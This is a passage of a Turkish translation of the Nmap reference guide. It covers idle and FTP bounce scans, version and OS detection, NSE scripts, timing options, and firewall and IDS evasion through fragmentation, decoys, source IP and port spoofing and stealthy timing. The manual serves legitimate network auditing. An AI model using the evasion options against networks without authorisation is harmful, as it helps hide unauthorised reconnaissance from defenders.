atağıyla hedef sunucunun açık potları hakkında bilgi sorgulaması
yapılır. IDS sistemleri isteğin belirttiğiniz zombi sistemden geldiğini
gösterir. Ayrıntılı bilgi için http://nmap.org/book/idlescan.html adresine
bakınız.
-sO (IP protokol scan)
IP protokol taraması hedef sunucunun hangi IP protokollerini (TCP,
ICMP, IGMP vb.) desteklediğini göstermekte kullanılır. Bu gerçek
anlamda bir kapı tarama değildir. Daha çok IP protokol sayıları
arasında değişim olduğundan kapı taraması sayılmaz. Ama hala -p ile
protokol sayılarının seçenek olarak kullanılmasını sağlar.
-b (ftp dönüş taraması)
FTP protokolünün en ilginç yönü proxy FTP bağlantısını
desteklemesidir. Kullanıcı bir FTP sunucuya bağlanır ve o sunucuya
üçüncü bir sunucuya transfer yapması için mesaj gönderir. Bunun en
tuhaf işlerinden biri hedef FTP sunucuya bir başka sunucunun kapı
taraması yapmasını sağlattırmaktır. Ya da FTP sunucunun hedef
sunucunun tanımlanan kapılarına dosya göndermesini sağlamaktır.
Nmap bu işlemi -b seçeneği ile yaparken FTP sunucu tanımı için
:@: kullanılması
gerekir. 1998'de çok kullanılan bir özellikti ama artık bu sorun ftp
sunucuların çoğunda çözülmüş görünmektedir.
Kapı tanımları ve tarama sırası
-p < kapı sınırları>
-F (Hızlı (sınırlı sayıda kapı) tarama)
-r (kapıları rastgele üretme)
--port-ratio
--top-ports

Servis ve sürüm belirleme
nmap uzaktaki bir sunucuya yönlendirildiğinde size 25/tcp, 80/tcp ve 53/udp
kapılarının açık olduğunu söyleyecektir. 2200 adet iyi bilinen servis veri
tabanına göre bunların SMTP, HTTP ve DNS servislere ait olduğunu
söyleyecektir. Bu servisler genelde belirtilen kapılarda bulunur ama güvenlik
açısından bazı yöneticilerin kapıları değiştirdikleri görülmüştür.
Nmap doğru da söylemiş olsa uyarıdaki bilgi yeterli değildir. Hangi
programların ve hangi sürümlerin olduğunu bilmek istersiniz. TCP ve UDP
kapılar belirlendikten sonra, gerçekte bu kapıların arkasında neyin
koştuğunu bilmek istersiniz. “map-service-probes” veri tabanı hangi
mesajları göndereceğini ve nasıl yanıt alacağını bilir.
Nmap servis protokolünü bulmaya çalışırken (FTP, SSH, Telnet, HTTP gibi),
uygulamanın adını (ISC BIND, Apache httpd, Solaris telnetd gibi) ve sürüm
numarası, sunucu adı, cihaz tipi (printer, router gibi) işletim sistemi ailesi
(windows, linux gibi) bilgilerini de toplar.
Eğer uygun olursa bu bilginin genel yazı biçiminde tanımlanışını da hazırlar.
Bazen X sunucu bağlantılara açık mı, SSH protokol sürümü ya da KaZaA
kullanıcı adı var mı gibi sıra dışı bilgilere de ulaşılabilir. Tabi ki bir çok servis
bu bilgileri vermez. Eğer nmap OpenSSL desteğiyle derlenmişse, şifreleme
katmanının arkasından servis dinlemek için SSL sunucuya bağlanır. UDP kapı
tarama açıldıktan sonra bazı UDP kapılar açık| elenmiş komunda kalır. Sürüm
belirleme işlemi bu kapılardan bilgi almaya çalışır. Açabilirse bu kapının
durumunu değiştirir (açık kapılarda yaptığı gibi). Eğer başarılı olunursa açık|
elenmiş kapılar için de aynı biçimde değerlendirilir. Bilinmesi gereken önemli
nokta nmap -A seçeneği sürüm belirlemeyi diğer şeylerin yanında yapabilir.
Eğer nmap aldığı yanıtı veri tabanındakilere benzetemezse, kapıya ne
gönderileceğini anlamanız için sonucu yazdırır.
Nmap 6500 deseni 650'den fazla SMTP, FTP, HTTP gibi protokoller için
tanımlamıştır.
Sürüm belirleme aşağıdaki seçeneklerle yapılır:

-sV
Yukarıda belirtildiği gibi sürüm numarasını belirlemekte kullanılır.
--all-ports
Sürüm belirlemede hiç bir kapısı atlama
--version-intensity
-sV sürüm taraması yapıldığında nmap bir dizi mesaj gönderir, 1 ile 9
arasında az bulunma sayısı atanır. Düşük sayılar daha çok kullanılan
servisleri tanımlar. Yoğunluk (intensity) düzeyi hangi mesajların
kullanılması gerektiğini belirtir. Ama yüksek yoğunluk düzeyi
olduğunda işlem daha uzun sürer. Varsayılan değer 7 olarak
belirlenmiştir. Yoğunluk düzeyi 0 ile 9 arasında olabilir.
--version-light
Bu aslında –version-intensity 2 ile aynı anlama gelir. Daha hızlı işlem
yapar ama daha az doğru sonuç çıkarır.
--version-all
eşdeğeri –version-intensity 9 olur ve her kapı için tüm mesajlar
denenir.
--version-trace
Sürüm belirleme hakkında “nmap ne iş yapmaktadır?” bu seçenekle
tanımlanır. Bayağı geniş bir açıklama kullanıcıya işlem hakkında
ayrıntılı bilgi verebilmektedir.
İşletim Sistemi belirleme
nmap tarafından en iyi yapılabilen şey karşı sunucunun işletim sistemini
belirlemektir. Nmap karşı sunucuya bir dizi TCP ve UDP paketleri gönderir ve
yanıttaki tüm bitleri inceler. Daha sonra yapılan bir dizi test sonucu (TCP ISN
örneklemesi gibi) nmap-os-db veri tabanındaki işletim sistemi parmak
izlerinden (2600 işletim sistemi parmak izi vardır) hangi işletim sistemi
olduğu bulunur. Her parmak izi işletim sisteminin açık yazılı biçimini, üretici
firmasını (Sun gibi) işletim sistemi sürümünü (10 gibi) ve cihaz tipini (genel
amaçlı, router, switch, oyun konsolu gibi). Bir çok parmak izinde
cpe:/o:linux:linux_kernel:2.6 gibi ortak platform adlandırması (CPE) bulunur.

Eğer nmap işletim sistemini tahmin edemezse ve koşular iyiyse (en az bir
açık kapı ve bir kapalı kapı) nmap size parmak izini gönderebileceğiniz bir
URL gösterir. Buna göre siz sunucudaki işletim sistemini anlarsanız, nmap
veri tabanına nasıl ekleneceğini bildirir, bundan sonra başkalarına da bu
cihazı tanımakta yardım olmuş olursunuz.
İşletim Sistemi belirleme bu adımda yapılan diğer işlemlerle elde edilen
bilgileri de paylaşır. Bunlardan biri TCP Sequence Predictability Classification
(TCP Tahmin edebilme Sınıfı sıralaması) olarak bilinir. Bu bilgi karşı sisteme
bağlanabilmenin ne kadar zorlukta olduğunu bildirir. Bu işlem sırasında
kaynak IP belirtilebilir, rlogin, güvenlik kalkanı gibi elemeler incelenebilir.
Ama bazı koşullarda kaynak IP'nin gizlenmesi de gerekebilir. Bu tür kaynak
gizleme artık pek yapılmamaktadır. Gerçek zorluk derecesi istatistik
örneklemelere dayanır ve değişebilir. Ama İngilizce sınıflamayı kullanmak
daha iyidir (“worthy challenge” ya da “trivial joke” gibi). Bu normal çıktı
konumunda (-v) ile olur. Eğer açıklamalı konum -O ile beraber açılırsa, IP
tanıtım üretimi de yazdırılır. Bir çok makine “incremental” (basamak) sınıfı
konumdadır. Bunun anlamı IP paketindeki ID bilgi alanını her mesaj
gönderdiklerinde arttırırlar.
Aşağıdaki seçeneklerle işletim sistemi açılır ve kontrol edilir.
-O (işletim sistemi belirlemeyi başlat)
İşletim Sistemi belirlemeyi başlatır. Ek olarak -A seçeneği ile diğerleri
de belirlenebilir.
--osscan-limit (işletim sistemini hedef sunucularla sınırla)
Bir kapalı ve bir açık kapı bulunduğunda işletim sistemi belirleme daha
etkin olabilir. Bu seçenek kullanıldığında nmap yeterli açık ve kapalı
kapı yoksa işletim sistemi belirlemeye kalkışmaz bile.
--osscan-guess; fuzzy (İşletim sistemi bilgileriyle tahmin yap)
nmap tam olarak işletim sistemini saptayamasa bile en yakın
olasılıkları sunabilir.
--max-os-tries (Bir hedef için en çok işletim sistemi tahminini sınırla)
nmap işletim sistemi taraması yapar ama doğru sonuç elde edemezse
başka denemeler yapmaya başlar. Bu seçenekle kaç tane deneme
yapılabileceği belirtilmiş olur.

Nmap komut makinesi (NSE)
nmap komut makinesi (NSE) nmap'in en güçlü ve en esnek özelliklerinden
biridir. Kullanıcıların küçük komut dizileri yazıp paylaşmalarına olanak verir
(Bu iş için Lua programlama dili http://lua.org/ kullanılır). Bu komut dizileriyle
geniş amaçlı ağ işlemleri otomatik olarak yapılabilir. Bu komutlar nmap
programından beklenen hız ve verimlilikle paralel olarak çalıştırılır.
Kullanıcılar nmap ile dağıtılan komutları müşteri isteklerine göre
değiştirebilir ya da kullanabilir.
İşe başlarken aklımızdaki işler ağı tanımlamak, daha geniş sürüm tanımı
yapmak, kırılganlığı belirlemek olmuştur. NSE kırılganlığın araştırılmasında
da kullanılabilir.
Bu tür değişik kullanım biçimlerini yansıtmak için hangi komutların
çalıştırılacağı seçilmelidir. Bu komutlar çalışma alanına göre sınıflara
ayrılmıştır. Şu anda bilinen sınıflar: auth (yetki), broadcast (yayım), default
(varsayılan), discovery (araştırma/bulma), dos, exploit (faydalanma),
external (dış), fuzzer (sahte, saçma veri), intrusive (sızan), malware (kötü
amaçlı), safe (güvenli), version (sürüm) ve vuln (kırılım) dır. Ayrıntılar
http://nmap.org/book/nse-usage.html#nse-categories adresinde vardır.
Toplu olarak çalıştırılan komutlar, istenmeden sisteminize zarar da verebilir.
Ya da özelinizi kurcalayabilir. Üçüncü partilerin komutlarını inceleyip güvenli
olmadan sakın kullanmayın.
Nmap altında bulunan seçenekler şunlardır:
-sC
Var olan komut kümesiyle komut taraması yapar. Aslında –
script=default ile aynı anlama gelir. Bu sınıftaki bazı komutlar araya
giren (sızan) türdendir ve ağ sorumlusundan izin alınmadan
kullanılmamalıdır.
--scriot |||[,...]
Komut taramasını virgülle ayrılmış dosyaları, sınıfları ve dosya yollarını
kullanarak yapar. Bu listelerdeki her öge daha karmaşık komut
kümesini gösteren mantıksal bir deyim olabilir. Her öge bir deyim,
daha sonra sınıf , dosya ve son olarak dosya yolu olarak yorumlanır.

Gelişmiş kullanıcılar için özellikler vardır. Biri deyimlerin ve komut
adlarının önüne + koyarak ön ek tanımlamaktır. Böylece çalışmaması
gerekse bile bu komutlar çalıştırılmış olunur. Diğeri ise her komutta
nmap veri tabanındaki tüm parametrelerin belirtilmesidir. Bu konuda
çok dikkatli olmak gerek. Çünkü nmap bazı koşullarda sızıntılar, zorla
yetki kırma gibi çok tehlikeli komutları içerir.
Dosya adı ve dosya yolu göreceli ya da mutlak olabilir. Mutlak adlar
doğrudan kullanılabilir. Göreceli adlarda dosya yolu için aşağıdaki
alanlarda komut olup olmadığına bakılır:
--datadir
$NMAPDIR
~/.nmap (windows ortamında buna gerek olmaz)
\AppData\Roaming\nmap (yalnız Windows için)
nmap'in bulunduğu dosya yolu
nmap'ın bulunduğu dosya yolunda ../share/nmap altında
NMAPDATADIR
O anda kullanılan dosya yolu
Bir dosya yolu verildiğinde nmap buradaki sonu .nse ile biten tüm
dosyaları yükler. Diğer dosyalar dikkate alınmaz. Dosya yolları
özyinemeli (recursive) taranmaz. Eğer parametrede dosya adı
verilmişse sonunun .nse olması gerekmez, dosya yüklenir.
Nmap komutları, nmap'in programcıkları (scripts) alt dosya yolunda
bulunur. Hozlı olması için komutların bir veri tabanında
(scripts/script.db) dizini tutulur. Burada komutun hangi sınıf ya da
sınıflarda bulunduğu saklanır.
Script.db altındaki komutlara erişimde “*” türü yazım geçerlidir.
nmap –script “http-*”
Burada http- ile başlayan tüm komutlar yüklenir. (örnek:
http-auth ve http-open-proxy gibi). Bu seçenekte
parametre değeri tırnak içinde olmalıdır (kabuk
programının etkisini kaldırmak için)

Daha karmaşık komut seçimi “and”, “or” ve “not”
kullanılarak yapılabilir. Lua'da işlemlerin önceliği aynıdır.
“not” her zaman en yüksek önceliklidir. Parantezler
kullanarak öncelikleri değiştirebilirsiniz. Bir çok deyimde
boşluklar olduğundan bunları her zaman tırnak içine almak
gerekir.
Nmap –script “not intrusive”
Sızıntılar sınıfı dışındaki her komutu yükler
namp –script “default or safe”
Bu aslında nmap –script “default,safe” ile aynı anlama
gelir. Varsayılan ya da güvenli sınıfındaki tüm komutları
yükler.
Nmap –script “default and safe”
Hem varsayılan hem de güvenli sınıflarında bulunanları
yükler.
Nmap –script “(default or safe or intrusive) and not http-*”
Varsayılan, güvenli ve sızıntı sınıflarında bulunan ama httpile
başlamayan komutları yükler.
--script-args =,={=v3>},={,}
NSE komutlarına parametre değerleri atanmasını sağlar. Parametre
değerleri ad=değer ikilisinin virgüllerle ayrılmış olanıdır. Adlar ya da
değerler içinde boşluk, '{', '}', '=', ',' olmayan karakter dizileridir.
Bunlardan birini içermesi için karakter dizisini çift ya da tek tırnak içine
alın. Tırnakları kullanabilmek için önüne ' \' yazın. Değerler bazen '{'
ve '}' içine yazılan tablo ögeleri olabilir. Lua dilinde bir tablo karakter
dizisi ya da ad ve değer ikilisi ögelerden ya da başka tablolardan
oluşabilir. Bir çok komutta parametreler komut adıyla kullanılır.
Örneğin xmpp-info.server_name gibi. Bu tür tanımı yalnız bir komutta
kullanmak için kullanabilirsiniz ya da “server_name” gibi belirleyici
olmayan halini bunu kullanan tüm komutlar için kullanabilirsiniz. Bir
komut önce kendine ait tanımlı parametrelere bakar, daha sonra genel
ve belirleyici olmayan parametre değerlerini inceler Karmaşık bir
komut parametre listesi örneği

--script-args 'user=foo,pass=",
{}=bar",whois={whodb=nofollow+ripe},xmppinfo.server_name=localhost'
biçiminde olabilir. http://nmap.org/nsedoc/ adresinde komutların kabul
edebileceği parametreler vardır.
--script-args-file
Burada parametreler bir dosyadan alınır.
--script-help ||||all[,...]
Komut hakkındaki yardımı göstermek için kullanılır.
--script-trace
Bu seçenek –packet-trace ne iş yapıyorsa onu yapar.
--script-updatedb
nmap tarafından kullanılan scripts/script.db veri tabanını
güncellemede kullanılır.
Zamanlama ve verim
Nmap değiştirilirken en önemli öncelik verim olmuştur. Buna göre nmap
sunucu_adı biçimindeki bir taramada yerel ağdaki sunucuyu taramak bir
saniyenin 50'de biri kadar olur. Bu da göz kırpmak kadar kısa bir süredir.
Ama bu süre yüzlerce sunucu taramaya kalktığınızda artar. Hatta UDP
taraması ve sürüm belirleme ve bazı güvenlik kalkanı tanımları bu süre
oldukça fazlalaştırır. Ama nmap bir çok gelişmiş algoritma ve paralelleştirme
seçenekleriyle taramaları hızlandırır.
Bazı seçenekler zaman parametresi içerir. Genelde süre saniye cinsindendir
ama sonuna 'ms', 's', 'm' ya da 'h' gibi değerler ekleyerek zaman
parametresini değiştirmek mümkündür. Buna göre “-–host-timeout”
parametresinde 900000ms, 900, 900s, ve 15m hepsi aynı şeydir.

--min-hostgroup ;
--max-hostgroup (Paralel tarama grubu büyüklüğü)
Nmap bir çok bilgisayar için kapı ya da sürüm taraması yapabilir.
Nmap bunu hedef IP adresleri sınıflara bölüp yapar. Her seferinde bir
grubu tarar. Genelde kalabalık gruplar daha verimli olur. Bir sakıncası,
tüm grup bitmeden sonuçların görünmüyor olmasıdır. Eğer nmap grup
büyüklüğü 50 olarak başlamışsa, 50 sunucu taranmadan sonuç
raporları çıkmaz.
Bu sorunu önlemek için nmap grup boyunu 5 yaparak işleme başlar (ki
ilk sonuçlar hemen alınabilsin) daha sonra artarak grup boyu 1024
olana dek işlem sürdürülür. Verimlilik açısından UDP ve birkaç TCP kapı
taraması için büyük gruplar kullanmak iyidir.
Eğer en çok sunucu sayısı belirtilmişse nmap bu sayıyı aşmaz.
Eğer en az sunucu sayısı büyük verilirse nmap daha hızlı sonuç
üretebilir.
Bu seçenek sunucu belirleme taramasında etkin değildir.
--min-parallelism ;
--max-parallelism (paralel mesaj ayarları)
Bu seçenekler hem kapı hem de sunucu belirlemede bir grup için
paralele gönderilecek mesaj saysını tanımlar. Aslında nmap paralel
mesaj sayısını ağın ve sunucuların durumuna göre dinamik ayarlar.
Eğer nmap mesajların kaybolduğunu anlarsa hemen hızı azaltır.
En çok kullanılanı en az paralel işlem sayısıdır. Özellikle zayıf yanıt
veren sunucuların bulunduğu gruplarda hızı arttırmak için gerekir.
En büyük paralel işlem sayısı, bazen aynı sunucuya birden çok aynı
mesajı göndermeyi engellemek için gerekir.

--min-rtt-timeout ,
--max-rtt-timeout ,
--initial-rtt-timeout (Adjust probe timeouts)
nmap bir mesaja ne kadar süreyle yanıt bekleyeceğini bilmelidir.
Bekleme ne kadar uzarsa, verimlilik o kadar düşer. Aslında nmap
önceki bekleme sürelerine göre olası bekleme süresini dinamik olarak
hesaplar. Eğer ağda bekleme fazlaysa hesaplanan süre bir kaç
saniyeye kadar uzar. İnitial-rtt-timeout ve max-rtt-timeout küçük
olursa varsayılan bekleme süreleri oldukça azalır.
Eğer tüm sunucular yerel ağ üzerindeyse –max-rtt-timeout 100ms
olarak belirlenebilir. --min-rtt-timeout çok az kullanılır. Ancak ağ çok
değişken özellik gösterip nmap tarafından bile taranmakta zorlanılırsa
bir değer verilmesi gerekebilir.
--max-retries
(En çok kapı tarama mesajı gönderme sayısı)
Eğer nmap bir kapıda gönderilen mesaj için yanıt almamışsa, ya poty
elenmiştir ya da mesaj ağ içinde kaybolmuştur. Yeniden gönderilmesi
söz konusudur. Bu seçenekte yeniden gönderilecek mesajların sayısı
bildirilir.
--host-timeout (Yavaş hedef sunucularda vazgeçme süresi)
Bazı sunucuları taramaz uzun zaman alır. Bunun nedenleri arasında
ağda belirsizlik, uygun olmayan sunucu ve donanım bulunabilir.
Sonunda bu seçeneği beklenecek en uzun süre olarak tanımlarsanız.
Sunucuyu beklerken çok zaman kaybedilmemiş olunur.
--scan-delay ;
--max-scan-delay (mesaj aralarındaki süreyi ayarlamak)
Sunucuya gönderilen mesajlar arasında bu seçenekte belirtilen kadar
süre bırakılır. Solaris bir çok diğer makineler gibi gelen bir mesaja her
saniye verdiği ICMP paketleriyle yanıt verir. Bu tür sunucularda
bekleme zamanı alınacak yanıttan daha kısa olursa, yanıt alınmadan
üst üste mesajlar gönderilmiş olunur.

Hız limitiyle bekleme süresi dengesi kurulduğunda tarama belirgin bir
biçimde yavaşlar. Bu durumda –max-scan-delay seçeneği nmap için
bir üst limit tanımlanmasına yardımcı olur.
--scan-delay seçeneğinin diğer bir kullanım biçimi alt sınır tabanlı
sızıntıları yakalamaktır (IDS/IPS). Bu teknik
http://nmap.org/book/firewalls.html#defeating-ids-snort-portscan adlı
sayfada homurdayan IDS için varsayılan kapı taramasını engelleyeni
yenmiştir. Aynı biçimde bir çok sistemde sızma yerini arayan
yenilebilir.
--min-rate ;
--max-rate (tarama hızını doğrudan kontrol etme)
nmap dinamik zamanlama yöntemi aslında tarama için en uygun
zamanı bulabilmektedir. Bazen ağ için de en uygun hız bilinmek
istenebilir, ya da taramanın belli bir zamana değin bitmesi istenebilir.
İşte –min-rate ve –max-rate bu amaç için tasarlanmıştır.
Eğer –min-rate verilmişse nmap taramada kullanılan mesajları bu hız
ölçüsünde gönderir. Diğeri (--max-rate) kullanılacak hızın daha fazla
olmamasını sağlar.
Hızlı bir ağ ortamında –max-rate 100 saniyede 100 mesaj
gönderilmesine göre limitler. --max-rate 0.1 olursa her mesaj 10
saniyede bir gönderilecek demektir.
Bu değerler geneldir. Tüm tarama işlemini etkiler, yalnız bir sunucuya
bağlı değildir.
--defeat-rst-ratelimit
Bir çok sunucu için uzun hız limitleri kullanılır. Amaç ICMP mesajlarının
sayısını azaltmaktır (örneğin kapıya erişilemiyor türü mesajlar). Bazı
sistemlerde RST (reset) mesajları için aynı şey yapılabilir. Nmap için bu
mesajları dikkate alma demek buradaki seçeneği kullanarak olur.

--nsock-engine epoll|kqueue|poll|select
Bu seçenekle nsock IO çoğaltmalı makinesinin kullanımı
zorlanmaktadır. Yalnız select(2) tabanlı geri düşüş makinesinin var
olduğu garanti edilir. Makineler IO yönetimiyle adlandırılırlar. Buradaki
makinelerin adları şöyledir: epoll, kqueue, poll ve select. Tüm
ortamlarda hepsi var denemez. Hangi makinelerin desteklendiğini
görmek için nmap -V komutunu kullanmak gerekir.
-T paranoid|sneaky|polite|normal|aggressive|insane
(Zaman kalıbı hazırlama)
Tartışılan zaman kontrolleri güçlü ve etkin olsa da bir çok insan
bunların kafa karıştırıcı olduğu söylemektedir. Bazen bu süreleri
ayarlamak için geçen zaman sizin yapmak istediğiniz işten daha çok
zaman alabilir.
Bu nedenle nmap 6 adet zaman çizelgesi sunar. Bunları -T seçeneği ile
tanımlayabilirsiniz. Adları 0-5 arasında değişen numaralardır. Bu
kalıplara paranoid-şüpheci(0), sneaky-yılanımsı(1), polite-kibar(2),
normal-normal(3), aggressive-agresif(4) ve insane-acımasız(5) denir.
İlk üçü IDS kaçamaklarıdır, kibar konumda nasıl scan yapılacağı
gösterilir, normal konumda -T3 kullanılır. Agresif konumda hızlı bir
ağda olduğunuz varsayılır. Son konumda sizin beklenenin üzerinde bir
hızınız olduğu varsayılır.
Güvenlik kalkanı/IDS kaçamakları ve gizlenme (spoofing)
Bir çok Internet öncüsü herhangi iki düğüm arasında Sanal bağlantı kurarak
evrensel IP adres uzayıyla geniş çaplı kaçamak bağlantı kurarlar. Bu
sunucuların gerçek uç olmalarını ve aralarında bilgi paylaşımı yapmalarını
sağlar. İnsanlar evdeki sistemlerine işten erişip iklim denetim ayarlarını
değiştirebilirler ve kendisinden önce gelecek misafirlere kapıyı bile
açtırabilirler. Bu tür bağlantı güvenlik ve adres uzayı sınırlamaları nedeniyle
bastırıldı. 1990'larda kurumlar güvenlik kalkanları kullanmaya başladılar.
Rahat yaşam kalktı, sınırsız bilgi akışı yerini onaylanmış kanalların iletişimine
bıraktı.
Bir ağı inceleyip haritasını çıkartmak güvenlik kalkanları yüzünden
neredeyse imkansız hale geldi. Bundan daha kolay hiç olmayacak. Ama
nmap o kadar çok özellik sunuyor ki bu ağları izlenebilir hale getirmek (bir
ölçüde) söz konusu olabiliyor. Hatta elemelerin istendiği gibi çalıştığı da
anlaşılabiliyor.

Ağ güvenliğinizin doğru çalışmadığını anlamanın en güzel yolu onu
yıkmaktır. Kendinizi saldırganın aklında olanlara odaklı ve kullanabileceği
tekniklerle saldırmaya başlayın. FTP geri tepme taraması başlatın,
parçalanmış saldırı yapın ya da kendi proxy'leriniz üzerinden tünelleme
yapın.
Ağ erişimini sınırlamaya ek olarak firmalar sızıntı yakalama sistemleriyle
(IDS gibi) ağlarındaki trafiği izlemektedirler. Bu ürünleri bir çoğu artık sızıntı
önleme sistemine (IPS) dönüştüler bile. Maalesef ağ yöneticileri ve IDS
satıcıları için bozuk paketleri yakalamak zor bir iştir. Sabırlı saldırganlar,
becerileri ve bazı nmap seçeneklerini kullanarak IDS'leri fark edilmeden
geçerler. Pek çok örnekte yöneticiler yanlış bulunan sonuçlarla alarm verilen
ya da bloklanan gerçek uygulamalarla karşılaşabilirler.
Bir çok kez nmap güvenlik kalkanını kıran özellikler sunmamalı, IDS'lerin
arasından yılanca sızan yöntemler çıkartmamalı derler. Güvenliği geliştiren
yöneticiler kadar saldırganlar da bu araçları kullanabilir derler. Burada sorun
bu araçları saldırganların zaten kullanacakları, nmap olmasa da başka
araçlarla ya da kendi geliştirdikleri yöntemlerle sonuca ulaşacaklarıdır. O
zaman yöneticiler işlerini daha zor yapacak, sistemin nasıl delindiğini bile
anlayamayacaklardır. Örneğin hatası giderilmiş bir FTP servisi, FTP
tepmesiyle çalışan ve güvenlik kalkanıyla durdurulmaya çalışılan bir
servisten her zaman daha kullanışlıdır.
IDS sistemlerini ya da güvenlik kalkanını yıkmaya çalışanı engelleyecek bir
nmap sihirli mermisi yoktur.
-f (fragment packets); --mtu (belirtilen MTU kullanılarak)
Bu seçenekteki tarama isteği (ping taraması da dahil) parçalanmış IP
paketleri kullanır. Buradaki amaç TCP başlığını paketler bölüp, paket
elemelerinin, sizi izleyenlerin anlayamayacağı mesaj oluşturmaktır.
Eski okul sniffer programlarından olan sniffit bu tür ilk paketi alınca
dump (döküm) verir. Bunu bir kez belirtince, nmap paketleri 8 bayt ya
da daha küçük IP başlıklarına böler. Böylece 20 baytlık IP başlığı üç
pakete dağılır. Tabi ki her parçanın kendi IP başlığı da vardır. -f
seçeneğini her parçada 16 bayt başlık kullanacak biçimde
tanımlayabilirsiniz (parça sayısını azaltmak için). Ya da başlangıcınızı
-mtu ile değiştirebilirsiniz. Eğer –mtu kullandıysanız bir daha -f
kullanmanız gerekmez. Başlangıç her zaman sekizin katları olmalıdır.
Parçalanmış paketler paket elemeleri ve tüm parçaları birleştiren
güvenlik kalkanları tarafından

yakalanamayınca, bazı ağlar oluşan verimlilik sorununu geçmek için
paketleri bırakırlar. Diğerleri bunları bırakmazlar. Çünkü parçalar kendi
ağlarında değişik yollara gidebilirler. Bazı kaynaklar çıkan paketleri
parçalamayı daha kernel düzeyinde yaparlar. Linux (iptables ile) bu tür
sistemlerden biridir. Eğer Wireshark adlı sniffer (koklayıcı) program
varsa paketlerinizi parçalamayı unutmayın. Eğer sizin işletim
sisteminiz sorun çıkarıyorsa “--send-eth” seçeneğini kullanarak IP
katmanını kaldırıp ham ethernet parçaları göndermeye başlayın.
Parçalama nmap ham paket özelliği için desteklenmektedir. TCP ve
UDP kapı taraması (connect taraması ve FTP geri tepmesi buna dahil
değildir) ve işletim sistemi belirleme bu kapsama girer.
-D [,][,ME][,...] (Tuzaklarla taramayı perdelemek)
Tuzak taraması yapılmasını sağlar. Hedef sunucuya da bu işlemde
belirtilen sunucularda tuzak olduğu ve ağda tuzak araması yapıldığı
benzeri bir durum meydana gelir. Böylece o sunucuların IDS'leri 5-10
kapı taramasından bazı IP'lerin kapı taraması yaptığı ama hangisinden
olduğunu anlayamadıklarını bildirir. Bunu yenmek için route yolunu
izleme, yanıt-düşürme (response-dropping) ve diğer aktif işlemlerle
yenilebilir. Bu IP adresinizi saklamak kadar önemli ve kullanışlıdır.
Tuzak sunucular virgülle ayrılır. Kendi gerçek IP adresinizi gösteren
ME'yi tuzaklardan biri olarak da belirtebilirsiniz. Eğer ME'yi altıncı
pozisyona ya da sonrasına koyarsanız, bazı kapı taramasını yakalayan
araçlar (Solaris'deki Scanlogd gibi), sizin IP adresinizi gösteremezler.
Eğer ME kullanmazsanız nmap sizi rastgele bir pozisyona yerleştirir.
RND de kullanabilirsiniz. RND rastgele çözümlenemeyecek IP adresleri
üretir. Ya da doğrudan “RND: ” ile kadar adres
üretebilirsiniz.
Dikkat edilecek şey sizin tuzak olarak tanımladığınız sunucular
çalışıyor olmalı ya da hedefinize kaza ile SYN akını yapmalıdır. Tabi ki
sunuculardan ancak biri ağ içinde çalışır durumdaysa hangi sunucunun
taramayı yaptığını bilmek kolay olur. Adlar yerine IP adreslerini
kullanmak isterseniz tuzak sunucular sizi kendi nameserver (ad
sunucu) kayıtlarında göremezler.

Tuzaklar ilk ping taramasında (ICMP, SYN, ACK vb.) ve gerçek kapı
tarama adımında kullanılır. Tuzaklar hedefin işletim sistemini
belirlerken (-O) de kullanılır. Tuzaklar sürüm belirleme ve TCP connect
taramasında kullanılamaz. Eğer tarama beklemesi (scan delay)
devredeyse, bekleme gizlenen mesajlar topluluğunun arasında
kullanılır. Çünkü batch topluca gönderildiğinden bekleme sınırlarını
zorlayabilirler.
Not almaya değer bir konu da çok fazla tuzak kullanmak kedi
taramanızı yavaşlatır ve doğan olarak daha az doğru sonuç
oluşmasına neden olabilir. Bazı ISS (Internet servis sağlayıcılar) sizin
gizlenmiş paketlerinizi eleyebilir. Ama bir çoğu gizlenmiş IP paketlerini
kontrol edemez bile.
-S (Kaynak adresini gizlemek)
Bazı durumlarda nmap sizin kaynak IP adresinizi saptayamayabilir
(nmap bu durumu size bildirir). Bu durumda “-S” seçeneği ile hangi
arayüzün hangi IP numarasını kullandığınızı bildirmeniz gerekebilir.
Bu seçeneğin bir başka kullanılabilecek özelliği, IP numarasını
gizlemektir. Hedef kendilerini bir başkasının taradığını sanır. Bu tür
kullanım için -e ve -Pn seçenekleri de gerekir. Unutmayın ki artık size
yanıt gelmeyecektir. Yanıtlar gizlendiğiniz IP'ye gider. Yani nmap
kullanılabilir raporlar üretemez.
-e (Kullanıcının belirlediği arayüz)
Bu seçenekle nmap'in hangi arayüzü kullanacağı belirtilmiş olur.
Kullanamazsa size bildirir.
--source-port ;
-g (Kaynak kapı numarasını gizlemek)
Hayretle izlenen ortak hata ağ trafiğine yalnız kaynağın kapısına bağlı
kalınmasıdır. Sorunlara güvenli yaklaşım, uygulama düzeyinde
proxy'ler ya da protokol tarayan güvenlik kalkanları olabilir. Tabi ki
daha kolay ve güvenli olmayan çözümler de vardır. Tüm DSN komutları
53 nolu kapıdan, ftp komutları 20 nolu kapıdan gelir. Bir çok güvenlik
yöneticisi bu kapılardan gelecek mesajlara kapılarını açarlar. Bu
kapıların saldırganlar tarafından bulunmayacağını sanırlar.

Yalnız çok çalışan yöneticiler bu tuzağa düşmezler. Pek çok sunucu
kuruluşunda bu açık zaten vardır. Microsoft bile bu konuda suçludur.
Örneği 88 nolu kapıya (Kerberos) gelen tüm TCP ve UDP mesajlarına
izin verilir (windows-2000 ve windows-xp). Ya da kişisel güvenlik
kalkanlarında dışarıdan 53 (DNS) ya da 67 (DHCP) kapılarına gelen
mesajlara izin verilmesidir.
Bu zayıf noktayı saptamak için Nmap hem -g hem de –source-port
seçeneklerini sunmaktadır. Amaç nmap tarafından paketlerin belirtilen
kapıdan gönderilmesidir. Bir çok tarama işleminde kullanılan ham
paketlerde bu seçenek desteklenmektedir.
--data-length (gönderilen paketlere rastgele veri eklemek)
Normal koşullarda nmap yalnız paket başlığı olan en küçük paketler
gönderir (TCP paketleri 40 bayt, ICMP yankı yanıtları ise 28 bayt olur).
Bazı UDP kapıları ve IP protokolleri varsayılan olarak alışılagelen
yükleri vardır. Bu seçenekle nmap programına pakete verilen
uzunlukta rastgele bilgi içeren ek yapılması görevi verilir. “-O”
seçeneğiyle yapılan işletim sistemi belirleme bundan etkilenmez. Bu
seçenek doğal olarak hızı biraz etkiler.
--ip-options ;
--ip-options (belirtilen IP seçenekleriyle veri göndermek)
IP protokolü paket başlığına eklenecek bir kaç seçenek sunar. TCP'ye
orakla IP seçenekleri pek kullanılmaz. Nedeni bu konuda güvenliğin
sağlanmış olmasındandır. Zaten bir çok Internet router cihazı kaynak
yönlendirmesi gibi tehlikeli seçenekleri engellemektedir. Hedef
